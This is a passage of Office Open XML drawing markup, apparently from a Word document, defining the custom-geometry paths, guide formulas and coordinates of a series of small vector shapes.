                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 68 w 83"/>
                                  <a:gd name="T1" fmla="*/ 21 h 60"/>
                                  <a:gd name="T2" fmla="*/ 73 w 83"/>
                                  <a:gd name="T3" fmla="*/ 39 h 60"/>
                                  <a:gd name="T4" fmla="*/ 83 w 83"/>
                                  <a:gd name="T5" fmla="*/ 60 h 60"/>
                                  <a:gd name="T6" fmla="*/ 68 w 83"/>
                                  <a:gd name="T7" fmla="*/ 60 h 60"/>
                                  <a:gd name="T8" fmla="*/ 52 w 83"/>
                                  <a:gd name="T9" fmla="*/ 56 h 60"/>
                                  <a:gd name="T10" fmla="*/ 31 w 83"/>
                                  <a:gd name="T11" fmla="*/ 43 h 60"/>
                                  <a:gd name="T12" fmla="*/ 0 w 83"/>
                                  <a:gd name="T13" fmla="*/ 0 h 60"/>
                                  <a:gd name="T14" fmla="*/ 0 w 83"/>
                                  <a:gd name="T15" fmla="*/ 0 h 60"/>
                                  <a:gd name="T16" fmla="*/ 31 w 83"/>
                                  <a:gd name="T17" fmla="*/ 13 h 60"/>
                                  <a:gd name="T18" fmla="*/ 68 w 83"/>
                                  <a:gd name="T19" fmla="*/ 2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3" h="60">
                                    <a:moveTo>
                                      <a:pt x="68" y="21"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="68" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="68" y="21"/>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330"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8062" y="3620"/>
                                <a:ext cx="47" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 47 w 47"/>
                                  <a:gd name="T1" fmla="*/ 22 h 26"/>
                                  <a:gd name="T2" fmla="*/ 36 w 47"/>
                                  <a:gd name="T3" fmla="*/ 26 h 26"/>
                                  <a:gd name="T4" fmla="*/ 21 w 47"/>
                                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                                  <a:gd name="T6" fmla="*/ 0 w 47"/>
                                  <a:gd name="T7" fmla="*/ 4 h 26"/>
                                  <a:gd name="T8" fmla="*/ 16 w 47"/>
                                  <a:gd name="T9" fmla="*/ 0 h 26"/>
                                  <a:gd name="T10" fmla="*/ 31 w 47"/>
                                  <a:gd name="T11" fmla="*/ 0 h 26"/>
                                  <a:gd name="T12" fmla="*/ 47 w 47"/>
                                  <a:gd name="T13" fmla="*/ 22 h 26"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T12" y="T13"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="47" h="26">
                                    <a:moveTo>
                                      <a:pt x="47" y="22"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="2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331"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7736" y="4049"/>
                                <a:ext cx="26" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 26 w 26"/>
                                  <a:gd name="T1" fmla="*/ 8 h 26"/>
                                  <a:gd name="T2" fmla="*/ 26 w 26"/>
                                  <a:gd name="T3" fmla="*/ 21 h 26"/>
                                  <a:gd name="T4" fmla="*/ 11 w 26"/>
                                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                                  <a:gd name="T6" fmla="*/ 6 w 26"/>
                                  <a:gd name="T7" fmla="*/ 26 h 26"/>
                                  <a:gd name="T8" fmla="*/ 0 w 26"/>
                                  <a:gd name="T9" fmla="*/ 17 h 26"/>
                                  <a:gd name="T10" fmla="*/ 6 w 26"/>
                                  <a:gd name="T11" fmla="*/ 8 h 26"/>
                                  <a:gd name="T12" fmla="*/ 11 w 26"/>
                                  <a:gd name="T13" fmla="*/ 0 h 26"/>
                                  <a:gd name="T14" fmla="*/ 21 w 26"/>
                                  <a:gd name="T15" fmla="*/ 4 h 26"/>
                                  <a:gd name="T16" fmla="*/ 26 w 26"/>
                                  <a:gd name="T17" fmla="*/ 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6">
                                    <a:moveTo>
                                      <a:pt x="26" y="8"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26"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332"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7690" y="4096"/>
                                <a:ext cx="109" cy="52"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 109 w 109"/>
                                  <a:gd name="T1" fmla="*/ 48 h 52"/>
                                  <a:gd name="T2" fmla="*/ 93 w 109"/>
                                  <a:gd name="T3" fmla="*/ 44 h 52"/>
                                  <a:gd name="T4" fmla="*/ 78 w 109"/>
                                  <a:gd name="T5" fmla="*/ 39 h 52"/>
                                  <a:gd name="T6" fmla="*/ 52 w 109"/>
                                  <a:gd name="T7" fmla="*/ 22 h 52"/>
                                  <a:gd name="T8" fmla="*/ 36 w 109"/>
                                  <a:gd name="T9" fmla="*/ 39 h 52"/>
                                  <a:gd name="T10" fmla="*/ 26 w 109"/>
                                  <a:gd name="T11" fmla="*/ 48 h 52"/>
                                  <a:gd name="T12" fmla="*/ 10 w 109"/>
                                  <a:gd name="T13" fmla="*/ 52 h 52"/>
                                  <a:gd name="T14" fmla="*/ 0 w 109"/>
                                  <a:gd name="T15" fmla="*/ 52 h 52"/>
                                  <a:gd name="T16" fmla="*/ 15 w 109"/>
                                  <a:gd name="T17" fmla="*/ 35 h 52"/>
                                  <a:gd name="T18" fmla="*/ 26 w 109"/>
                                  <a:gd name="T19" fmla="*/ 18 h 52"/>
                                  <a:gd name="T20" fmla="*/ 41 w 109"/>
                                  <a:gd name="T21" fmla="*/ 0 h 52"/>
                                  <a:gd name="T22" fmla="*/ 52 w 109"/>
                                  <a:gd name="T23" fmla="*/ 0 h 52"/>
                                  <a:gd name="T24" fmla="*/ 67 w 109"/>
                                  <a:gd name="T25" fmla="*/ 0 h 52"/>
                                  <a:gd name="T26" fmla="*/ 93 w 109"/>
                                  <a:gd name="T27" fmla="*/ 22 h 52"/>
                                  <a:gd name="T28" fmla="*/ 109 w 109"/>
                                  <a:gd name="T29" fmla="*/ 4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9" h="52">
                                    <a:moveTo>
                                      <a:pt x="109" y="48"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="109" y="4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333"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7731" y="4144"/>
                                <a:ext cx="31" cy="35"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 31 w 31"/>
                                  <a:gd name="T1" fmla="*/ 13 h 35"/>
                                  <a:gd name="T2" fmla="*/ 26 w 31"/>
                                  <a:gd name="T3" fmla="*/ 26 h 35"/>
                                  <a:gd name="T4" fmla="*/ 16 w 31"/>
                                  <a:gd name="T5" fmla="*/ 35 h 35"/>
                                  <a:gd name="T6" fmla="*/ 5 w 31"/>
                                  <a:gd name="T7" fmla="*/ 26 h 35"/>
                                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                                  <a:gd name="T9" fmla="*/ 17 h 35"/>
                                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                                  <a:gd name="T11" fmla="*/ 13 h 35"/>
                                  <a:gd name="T12" fmla="*/ 5 w 31"/>
                                  <a:gd name="T13" fmla="*/ 4 h 35"/>
                                  <a:gd name="T14" fmla="*/ 16 w 31"/>
                                  <a:gd name="T15" fmla="*/ 0 h 35"/>
                                  <a:gd name="T16" fmla="*/ 26 w 31"/>
                                  <a:gd name="T17" fmla="*/ 4 h 35"/>
                                  <a:gd name="T18" fmla="*/ 31 w 31"/>
                                  <a:gd name="T19" fmla="*/ 9 h 35"/>
                                  <a:gd name="T20" fmla="*/ 31 w 31"/>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 h="35">
                                    <a:moveTo>
                                      <a:pt x="31" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="1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334"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7768" y="4166"/>
                                <a:ext cx="20" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 20 w 20"/>
                                  <a:gd name="T1" fmla="*/ 0 h 26"/>
                                  <a:gd name="T2" fmla="*/ 15 w 20"/>
                                  <a:gd name="T3" fmla="*/ 21 h 26"/>
                                  <a:gd name="T4" fmla="*/ 10 w 20"/>
                                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                                  <a:gd name="T6" fmla="*/ 0 w 20"/>
                                  <a:gd name="T7" fmla="*/ 26 h 26"/>
                                  <a:gd name="T8" fmla="*/ 0 w 20"/>
                                  <a:gd name="T9" fmla="*/ 21 h 26"/>
                                  <a:gd name="T10" fmla="*/ 0 w 20"/>
                                  <a:gd name="T11" fmla="*/ 13 h 26"/>
                                  <a:gd name="T12" fmla="*/ 10 w 20"/>
                                  <a:gd name="T13" fmla="*/ 0 h 26"/>
                                  <a:gd name="T14" fmla="*/ 20 w 20"/>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6">
                                    <a:moveTo>
                                      <a:pt x="20" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="2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335"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7705" y="4170"/>
                                <a:ext cx="26" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 26 w 26"/>
                                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                                  <a:gd name="T2" fmla="*/ 16 w 26"/>
                                  <a:gd name="T3" fmla="*/ 22 h 26"/>
                                  <a:gd name="T4" fmla="*/ 11 w 26"/>
                                  <a:gd name="T5" fmla="*/ 17 h 26"/>
                                  <a:gd name="T6" fmla="*/ 0 w 26"/>
                                  <a:gd name="T7" fmla="*/ 0 h 26"/>
                                  <a:gd name="T8" fmla="*/ 6 w 26"/>
                                  <a:gd name="T9" fmla="*/ 0 h 26"/>
                                  <a:gd name="T10" fmla="*/ 21 w 26"/>
                                  <a:gd name="T11" fmla="*/ 13 h 26"/>
                                  <a:gd name="T12" fmla="*/ 26 w 26"/>
                                  <a:gd name="T13" fmla="*/ 22 h 26"/>
                                  <a:gd name="T14" fmla="*/ 26 w 26"/>
                                  <a:gd name="T15" fmla="*/ 26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6">
                                    <a:moveTo>
                                      <a:pt x="26" y="26"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="2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336"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7742" y="4205"/>
                                <a:ext cx="20" cy="21"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 20 w 20"/>
                                  <a:gd name="T1" fmla="*/ 8 h 21"/>
                                  <a:gd name="T2" fmla="*/ 15 w 20"/>
                                  <a:gd name="T3" fmla="*/ 17 h 21"/>
                                  <a:gd name="T4" fmla="*/ 5 w 20"/>
                                  <a:gd name="T5" fmla="*/ 21 h 21"/>
                                  <a:gd name="T6" fmla="*/ 0 w 20"/>
                                  <a:gd name="T7" fmla="*/ 13 h 21"/>
                                  <a:gd name="T8" fmla="*/ 0 w 20"/>
                                  <a:gd name="T9" fmla="*/ 4 h 21"/>
                                  <a:gd name="T10" fmla="*/ 5 w 20"/>
                                  <a:gd name="T11" fmla="*/ 0 h 21"/>
                                  <a:gd name="T12" fmla="*/ 15 w 20"/>
                                  <a:gd name="T13" fmla="*/ 4 h 21"/>
                                  <a:gd name="T14" fmla="*/ 20 w 20"/>
                                  <a:gd name="T15" fmla="*/ 8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1">
                                    <a:moveTo>
                                      <a:pt x="20" y="8"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="2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337"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7742" y="4248"/>
                                <a:ext cx="20" cy="17"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 20 w 20"/>
                                  <a:gd name="T1" fmla="*/ 9 h 17"/>
                                  <a:gd name="T2" fmla="*/ 15 w 20"/>
                                  <a:gd name="T3" fmla="*/ 13 h 17"/>
                                  <a:gd name="T4" fmla="*/ 10 w 20"/>
                                  <a:gd name="T5" fmla="*/ 17 h 17"/>
                                  <a:gd name="T6" fmla="*/ 0 w 20"/>
                                  <a:gd name="T7" fmla="*/ 13 h 17"/>
                                  <a:gd name="T8" fmla="*/ 5 w 20"/>
                                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                                  <a:gd name="T10" fmla="*/ 15 w 20"/>
                                  <a:gd name="T11" fmla="*/ 0 h 17"/>
                                  <a:gd name="T12" fmla="*/ 20 w 20"/>
                                  <a:gd name="T13" fmla="*/ 9 h 17"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T12" y="T13"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="20" h="17">
                                    <a:moveTo>
                                      <a:pt x="20" y="9"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="2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38"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7514" y="4456"/>
                                <a:ext cx="119" cy="95"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 114 w 119"/>
                                  <a:gd name="T1" fmla="*/ 69 h 95"/>
                                  <a:gd name="T2" fmla="*/ 119 w 119"/>
                                  <a:gd name="T3" fmla="*/ 95 h 95"/>
                                  <a:gd name="T4" fmla="*/ 114 w 119"/>
                                  <a:gd name="T5" fmla="*/ 95 h 95"/>
                                  <a:gd name="T6" fmla="*/ 109 w 119"/>
                                  <a:gd name="T7" fmla="*/ 95 h 95"/>
                                  <a:gd name="T8" fmla="*/ 104 w 119"/>
                                  <a:gd name="T9" fmla="*/ 86 h 95"/>
                                  <a:gd name="T10" fmla="*/ 88 w 119"/>
                                  <a:gd name="T11" fmla="*/ 56 h 95"/>
                                  <a:gd name="T12" fmla="*/ 78 w 119"/>
                                  <a:gd name="T13" fmla="*/ 43 h 95"/>
                                  <a:gd name="T14" fmla="*/ 62 w 119"/>
                                  <a:gd name="T15" fmla="*/ 26 h 95"/>
                                  <a:gd name="T16" fmla="*/ 52 w 119"/>
                                  <a:gd name="T17" fmla="*/ 26 h 95"/>
                                  <a:gd name="T18" fmla="*/ 42 w 119"/>
                                  <a:gd name="T19" fmla="*/ 30 h 95"/>
                                  <a:gd name="T20" fmla="*/ 0 w 119"/>
                                  <a:gd name="T21" fmla="*/ 91 h 95"/>
                                  <a:gd name="T22" fmla="*/ 0 w 119"/>
                                  <a:gd name="T23" fmla="*/ 86 h 95"/>
                                  <a:gd name="T24" fmla="*/ 0 w 119"/>
                                  <a:gd name="T25" fmla="*/ 78 h 95"/>
                                  <a:gd name="T26" fmla="*/ 5 w 119"/>
                                  <a:gd name="T27" fmla="*/ 69 h 95"/>
                                  <a:gd name="T28" fmla="*/ 26 w 119"/>
                                  <a:gd name="T29" fmla="*/ 34 h 95"/>
                                  <a:gd name="T30" fmla="*/ 52 w 119"/>
                                  <a:gd name="T31" fmla="*/ 0 h 95"/>
                                  <a:gd name="T32" fmla="*/ 73 w 119"/>
                                  <a:gd name="T33" fmla="*/ 13 h 95"/>
                                  <a:gd name="T34" fmla="*/ 88 w 119"/>
                                  <a:gd name="T35" fmla="*/ 30 h 95"/>
                                  <a:gd name="T36" fmla="*/ 114 w 119"/>
                                  <a:gd name="T37" fmla="*/ 69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95">
                                    <a:moveTo>
                                      <a:pt x="114" y="69"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="109" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="104" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114"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339"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7535" y="4503"/>
                                <a:ext cx="67" cy="100"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 62 w 67"/>
                                  <a:gd name="T1" fmla="*/ 31 h 100"/>
                                  <a:gd name="T2" fmla="*/ 67 w 67"/>
                                  <a:gd name="T3" fmla="*/ 48 h 100"/>
                                  <a:gd name="T4" fmla="*/ 67 w 67"/>
                                  <a:gd name="T5" fmla="*/ 65 h 100"/>
                                  <a:gd name="T6" fmla="*/ 52 w 67"/>
                                  <a:gd name="T7" fmla="*/ 70 h 100"/>
                                  <a:gd name="T8" fmla="*/ 41 w 67"/>
                                  <a:gd name="T9" fmla="*/ 78 h 100"/>
                                  <a:gd name="T10" fmla="*/ 41 w 67"/>
                                  <a:gd name="T11" fmla="*/ 83 h 100"/>
                                  <a:gd name="T12" fmla="*/ 41 w 67"/>
                                  <a:gd name="T13" fmla="*/ 96 h 100"/>
                                  <a:gd name="T14" fmla="*/ 31 w 67"/>
                                  <a:gd name="T15" fmla="*/ 100 h 100"/>
                                  <a:gd name="T16" fmla="*/ 26 w 67"/>
                                  <a:gd name="T17" fmla="*/ 100 h 100"/>
                                  <a:gd name="T18" fmla="*/ 26 w 67"/>
                                  <a:gd name="T19" fmla="*/ 91 h 100"/>
                                  <a:gd name="T20" fmla="*/ 26 w 67"/>
                                  <a:gd name="T21" fmla="*/ 78 h 100"/>
                                  <a:gd name="T22" fmla="*/ 0 w 67"/>
                                  <a:gd name="T23" fmla="*/ 65 h 100"/>
                                  <a:gd name="T24" fmla="*/ 15 w 67"/>
                                  <a:gd name="T25" fmla="*/ 31 h 100"/>
                                  <a:gd name="T26" fmla="*/ 31 w 67"/>
                                  <a:gd name="T27" fmla="*/ 0 h 100"/>
                                  <a:gd name="T28" fmla="*/ 41 w 67"/>
                                  <a:gd name="T29" fmla="*/ 5 h 100"/>
                                  <a:gd name="T30" fmla="*/ 52 w 67"/>
                                  <a:gd name="T31" fmla="*/ 13 h 100"/>
                                  <a:gd name="T32" fmla="*/ 62 w 67"/>
                                  <a:gd name="T33" fmla="*/ 3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 h="100">
                                    <a:moveTo>
                                      <a:pt x="62" y="31"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="83"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="96"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="31"/>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340"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7457" y="4508"/>
                                <a:ext cx="37" cy="34"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 37 w 37"/>
                                  <a:gd name="T1" fmla="*/ 13 h 34"/>
                                  <a:gd name="T2" fmla="*/ 37 w 37"/>
                                  <a:gd name="T3" fmla="*/ 26 h 34"/>
                                  <a:gd name="T4" fmla="*/ 26 w 37"/>
                                  <a:gd name="T5" fmla="*/ 34 h 34"/>
                                  <a:gd name="T6" fmla="*/ 11 w 37"/>
                                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                                  <a:gd name="T8" fmla="*/ 0 w 37"/>
                                  <a:gd name="T9" fmla="*/ 21 h 34"/>
                                  <a:gd name="T10" fmla="*/ 0 w 37"/>
                                  <a:gd name="T11" fmla="*/ 13 h 34"/>
                                  <a:gd name="T12" fmla="*/ 0 w 37"/>
